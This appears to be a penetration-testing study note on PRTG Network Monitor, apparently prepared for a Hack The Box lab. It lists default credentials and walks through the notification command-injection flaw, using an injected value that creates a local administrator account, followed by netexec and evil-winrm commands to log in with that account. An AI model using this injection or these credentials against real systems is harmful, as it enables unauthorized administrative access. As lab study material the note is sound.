Skip to content

PRTG Network Monitor

  • PRTG Network Monitor is agentless network monitor software
  • monitor bandwidth usage, uptime, stats from hosts, routers, servers, etc
  • sensor based monitoring and can auto-detect protocols like ICMP, SNMP, WMI, NetFlow, etc.
  • Devices can also communicate with the tool via a REST API. The software runs entirely from an AJAX-based website, but there is a desktop application available for Windows, Linux, and macOS.
  • CVEs- https://www.cvedetails.com/vulnerability-list/vendor_id-5034/product_id-35656/Paessler-Prtg-Network-Monitor.html
  • HTB Box - https://0xdf.gitlab.io/2019/06/29/htb-netmon.html

Enum

  • nmap scan - can be found on ports 80, 443, 8080
    • eg: Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
  • EyeWitness flagged this with default credentials prtgadmin:prtgadmin.
  • For Network tools, look for notifications - these can allow scripts, cmd execution.

Attack:

  • we know the version is - 18.1.37.13946
  • it is vulnerable to command injection - https://codewatch.org/2018/06/25/prtg-18-2-39-command-injection-vulnerability/

Steps:

  • Login into the application
    • Burp intruder for brute forcing
    • prtgadmin:Password123
  • In System > Notification, Add a notification
  • Enable Execute Program , choose the Demo.ps1 file
  • Add the following command to add a new domain user to the host.
    • test.txt;net user prtgadm1 Pwn3d_by_PRTG! /add;net localgroup administrators prtgadm1 /add
    • this is because the network infra tools usually run as SYSTEM/ROOT
  • Save the notification.
  • Click on the notification and on the right side see the bell (test notification).
  • After clicking Test we will get a pop-up that says EXE notification is queued up.
    • If we receive any sort of error message here, we can go back and double-check the notification settings.
  • Check using netexec smb 10.129.201.50 -u prtgadm1 -p Pwn3d_by_PRTG!
  • evil-winrm -i 10.129.201.50 -u prtgadm1 -p Pwn3d_by_PRTG!